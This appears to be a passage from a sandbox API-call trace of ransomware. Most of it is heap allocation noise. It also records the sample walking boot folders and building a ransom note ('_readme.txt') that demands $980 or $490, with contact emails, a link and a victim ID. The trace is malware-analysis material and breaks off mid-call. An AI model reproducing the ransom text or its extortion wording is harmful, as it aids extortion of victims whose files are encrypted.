1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.529] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.533] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0165.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.534] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.534] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.534] PathFindFileNameW (pszPath="") returned="" [0165.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.534] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.534] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.534] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.534] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.535] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0165.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.535] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0165.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.536] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.536] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.536] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.536] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.537] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.537] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.537] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.537] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.537] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap 